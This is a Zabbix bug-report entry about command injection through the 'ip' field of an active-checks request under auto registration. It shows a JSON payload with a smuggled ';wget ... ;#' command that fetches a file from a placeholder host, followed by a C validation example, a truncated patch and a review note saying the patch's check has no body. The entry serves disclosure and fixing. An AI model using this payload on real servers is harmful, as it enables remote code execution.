- Change Request
- Resolution: Duplicate
- Blocker
- None
- 2.2.18, 3.0.9
- None
I confirmed that you fixed ZBX-12075 etc. in 3.0.9 and 2.2.18, but it is not enough, because you do not take into account the situation of active checks with auto registration.
I send the following command to the Zabbix trapper.
{ "request":"active checks", "host":"foobar", "ip":";wget -O /tmp/s http://www.xxx.yyy.zzz/s;#" }
If the Zabbix server allows auto registration, the host is registered. So, with the default scripts, command injection is possible.
To fix the above, I attached a patch that does not accept an incorrect ip at auto registration on active checks.
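The validation the attached patch proposes, written out as a stand-alone C example (added here; it is neither the reporter's patch nor Zabbix code): the JSON "ip" value is accepted only when it parses as an IPv4 or IPv6 literal, and otherwise an error in the same form as the existing "invalid host name" check is returned. inet_pton() is used in place of Zabbix's is_ip(); the SUCCEED/FAIL/MAX_STRING_LEN definitions, the function names and the sample inputs are assumptions made for a self-contained build.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>

/* Result codes in the Zabbix style; the real project defines these in its own
 * headers, so these definitions are an assumption for a stand-alone build. */
#define SUCCEED         0
#define FAIL            -1
#define MAX_STRING_LEN  2048

/*
 * Accept the "ip" value of an active-checks request only if it is an IPv4 or
 * IPv6 literal. inet_pton() stands in for Zabbix's own is_ip(): it rejects
 * hostnames, whitespace, shell metacharacters such as ';' and '#', and any
 * trailing characters after an otherwise valid address. On failure an error
 * message in the form of the existing "invalid host name [%s]" check is written.
 */
static int validate_autoreg_ip(const char *ip, char *error, size_t error_len)
{
	unsigned char addr[sizeof(struct in6_addr)];

	if (NULL == ip || '\0' == *ip)
	{
		snprintf(error, error_len, "missing ip");
		return FAIL;
	}

	if (1 == inet_pton(AF_INET, ip, addr) || 1 == inet_pton(AF_INET6, ip, addr))
		return SUCCEED;

	snprintf(error, error_len, "invalid ip [%s]", ip);
	return FAIL;
}

/* Convenience wrapper (assumed name): 1 if the value would be accepted for
 * auto registration, 0 if it would be rejected. */
int autoreg_ip_ok(const char *ip)
{
	char error[MAX_STRING_LEN];

	return SUCCEED == validate_autoreg_ip(ip, error, sizeof(error)) ? 1 : 0;
}

int main(void)
{
	/* Constructed samples: two legitimate agent addresses, then values shaped
	 * like the injection string from the report, all of which must be rejected. */
	const char *samples[] = {
		"192.0.2.10",
		"2001:db8::1",
		";wget -O /tmp/s http://example.invalid/s;#",
		"192.0.2.10;id",
		"192.0.2.10 ",
		"foobar.example",
		"",
	};
	size_t i;

	for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
	{
		char error[MAX_STRING_LEN];

		if (SUCCEED == validate_autoreg_ip(samples[i], error, sizeof(error)))
			printf("accept  [%s]\n", samples[i]);
		else
			printf("reject  %s\n", error);
	}

	return 0;
}
```

A literal-address check closes this particular vector at the trapper; values that a default script still passes to a shell should additionally be quoted or handed to the command without a shell, since the IP check says nothing about other fields.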
— src/zabbix_server/trapper/active.c 2017-02-27 18:22:48.000000000 +0900
+++ src/zabbix_server/trapper/active.c.new 2017-05-30 11:15:19.623254495 +0900
@@ -56,6 +56,12 @@ static int get_hostid_by_host(const char
zabbix_log(LOG_LEVEL_DEBUG, "In %s() host:'%s'", __function_name, host);
+ if (FAIL == is_ip(ip))
+
+
if (FAIL == zbx_check_hostname(host))
{
zbx_snprintf(error, MAX_STRING_LEN, "invalid host name [%s]", host);
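Review bot: the added `if (FAIL == is_ip(ip))` at the top of get_hostid_by_host() has no visible body: the two `+` lines that follow it are blank, and the `@@ -56,6 +56,12 @@` header promises six added lines of which only three appear, so as posted the condition guards nothing and an invalid ip falls through to the host-name check unchanged. Please show the rejection branch explicitly, mirroring the existing host-name path directly below it, e.g. `zbx_snprintf(error, MAX_STRING_LEN, "invalid ip [%s]", ip); return FAIL;`. It would also help to include enough context to confirm that `ip` is a parameter of get_hostid_by_host() (the header is truncated at `const char`), since the check has to run on the value taken from the JSON "ip" field before it is stored for auto registration.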